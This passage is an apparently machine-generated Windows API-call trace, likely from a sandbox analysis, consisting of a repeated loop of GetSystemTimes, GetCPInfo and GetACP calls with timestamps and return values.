lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.544] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.544] GetACP () returned 0x4e4 [0044.638] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.638] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.639] GetACP () returned 0x4e4 [0044.639] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.639] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.639] GetACP () returned 0x4e4 [0044.639] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.639] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.639] GetACP () returned 0x4e4 [0044.639] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.640] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.640] GetACP () returned 0x4e4 [0044.640] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.640] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.640] GetACP () returned 0x4e4 [0044.640] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.640] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.640] GetACP () returned 0x4e4 [0044.640] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.640] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.640] GetACP () returned 0x4e4 [0044.640] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.640] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.640] GetACP () returned 0x4e4 [0044.640] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.640] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.640] GetACP () returned 0x4e4 [0044.640] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.640] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.640] GetACP () returned 0x4e4 [0044.640] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.640] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.640] GetACP () returned 0x4e4 [0044.640] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.640] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.640] GetACP () returned 0x4e4 [0044.640] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.641] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.641] GetACP () returned 0x4e4 [0044.641] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.641] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.641] GetACP () returned 0x4e4 [0044.641] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.641] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.641] GetACP () returned 0x4e4 [0044.641] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.641] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.641] GetACP () returned 0x4e4 [0044.641] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.641] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.641] GetACP () returned 0x4e4 [0044.641] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.641] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.641] GetACP () returned 0x4e4 [0044.641] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.641] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.641] GetACP () returned 0x4e4 [0044.641] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.641] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.641] GetACP () returned 0x4e4 [0044.641] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.641] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.641] GetACP () returned 0x4e4 [0044.641] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.641] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.641] GetACP () returned 0x4e4 [0044.641] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.642] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.642] GetACP () returned 0x4e4 [0044.642] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.642] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.642] GetACP () returned 0x4e4 [0044.642] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.642] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.642] GetACP () returned 0x4e4 [0044.642] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.642] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.642] GetACP () returned 0x4e4 [0044.642] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.642] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.642] GetACP () returned 0x4e4 [0044.642] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.642] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.642] GetACP () returned 0x4e4 [0044.642] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.642] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.642] GetACP () returned 0x4e4 [0044.642] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.642] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.642] GetACP () returned 0x4e4 [0044.642] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.642] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.642] GetACP () returned 0x4e4 [0044.642] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.642] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.642] GetACP () returned 0x4e4 [0044.642] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.643] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.643] GetACP () returned 0x4e4 [0044.643] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.643] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.643] GetACP () returned 0x4e4 [0044.643] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.643] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.643] GetACP () returned 0x4e4 [0044.643] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.643] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.643] GetACP () returned 0x4e4 [0044.643] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.643] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.643] GetACP () returned 0x4e4 [0044.643] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.643] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.643] GetACP () returned 0x4e4 [0044.643] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.643] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.643] GetACP () returned 0x4e4 [0044.643] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.643] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.643] GetACP () returned 0x4e4 [0044.643] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.643] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.643] GetACP () returned 0x4e4 [0044.643] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.643] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.643] GetACP () returned 0x4e4 [0044.644] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.644] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.644] GetACP () returned 0x4e4 [0044.644] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.644] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.644] GetACP () returned 0x4e4 [0044.644] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.644] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.644] GetACP () returned 0x4e4 [0044.644] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.644] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.644] GetACP () returned 0x4e4 [0044.644] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.644] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.644] GetACP () returned 0x4e4 [0044.644] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.644] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.644] GetACP () returned 0x4e4 [0044.644] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.644] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.644] GetACP () returned 0x4e4 [0044.644] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.644] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.644] GetACP () returned 0x4e4 [0044.644] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.644] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.644] GetACP () returned 0x4e4 [0044.644] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.645] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.645] GetACP () returned 0x4e4 [0044.645] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.645] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.645] GetACP () returned 0x4e4 [0044.645] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.645] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.645] GetACP () returned 0x4e4 [0044.645] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.645] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.645] GetACP () returned 0x4e4 [0044.645] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.645] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.645] GetACP () returned 0x4e4 [0044.645] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.645] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.645] GetACP () returned 0x4e4 [0044.645] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.645] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.645] GetACP () returned 0x4e4 [0044.645] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.645] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.645] GetACP () returned 0x4e4 [0044.645] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.645] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.645] GetACP () returned 0x4e4 [0044.645] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.645] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.645] GetACP () returned 0x4e4 [0044.645] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.646] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.646] GetACP () returned 0x4e4 [0044.646] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.646] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.646] GetACP () returned 0x4e4 [0044.646] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.646] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.646] GetACP () returned 0x4e4 [0044.646] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.646] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.646] GetACP () returned 0x4e4 [0044.646] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.646] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.646] GetACP () returned 0x4e4 [0044.646] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.646] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.646] GetACP () returned 0x4e4 [0044.646] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.646] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.646] GetACP () returned 0x4e4 [0044.646] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.646] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.646] GetACP () returned 0x4e4 [0044.646] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.646] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.646] GetACP () returned 0x4e4 [0044.646] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.646] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.646] GetACP () returned 0x4e4 [0044.646] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.647] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.647] GetACP () returned 0x4e4 [0044.647] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.647] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.647] GetACP () returned 0x4e4 [0044.647] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.647] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.647] GetACP () returned 0x4e4 [0044.647] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.647] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.647] GetACP () returned 0x4e4 [0044.647] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, 